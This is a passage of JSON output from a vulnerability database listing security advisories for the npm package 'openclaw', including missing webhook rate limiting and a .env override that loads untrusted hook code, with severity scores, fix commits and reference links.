                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41355",
                "GHSA-42mx-vp8m-j7qh"
            ],
            "risk_score": 3.3,
            "exploitability": "0.5",
            "weighted_severity": "6.6",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vqrj-z6tx-rff2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90962?format=api",
            "vulnerability_id": "VCID-vtqt-bgz7-yub6",
            "summary": "Duplicate Advisory: OpenClaw's Nextcloud Talk webhook missing rate limiting on shared secret authentication\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-9528-x887-j2fp. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 does not rate-limit Nextcloud Talk webhook authentication, which allows attackers to brute-force weak shared secrets. Attackers who can reach the webhook endpoint can attempt authentication repeatedly without throttling and, once the shared secret is guessed, forge inbound webhook events.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33580",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33580"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gm9m-x74r-8whg",
                    "reference_id": "GHSA-gm9m-x74r-8whg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-gm9m-x74r-8whg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "GHSA-gm9m-x74r-8whg"
            ],
            "risk_score": 4.4,
            "exploitability": "0.5",
            "weighted_severity": "8.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vtqt-bgz7-yub6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90013?format=api",
            "vulnerability_id": "VCID-vx5d-3d98-7kf3",
            "summary": "OpenClaw: Workspace `.env` can override the bundled hooks root and load attacker hook code\n## Summary\nWorkspace `.env` can override the bundled hooks root and load attacker hook code\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_HOOKS_DIR, which can replace trusted default-on bundled hooks from an untrusted workspace.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `330a9f98cb29c79b1c16a2117e03d6276a0d6289` — 2026-03-31T19:25:12+09:00\n\nOpenClaw thanks @nexrin for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41336",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00016",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03575",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00016",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03582",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00016",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03589",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41336"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3qpv-xf3v-mm45",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3qpv-xf3v-mm45"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41336",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41336"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-hook-code-execution-via-openclaw-bundled-hooks-dir-environment-variable-override",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-hook-code-execution-via-openclaw-bundled-hooks-dir-environment-variable-override"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3qpv-xf3v-mm45",
                    "reference_id": "GHSA-3qpv-xf3v-mm45",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3qpv-xf3v-mm45"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
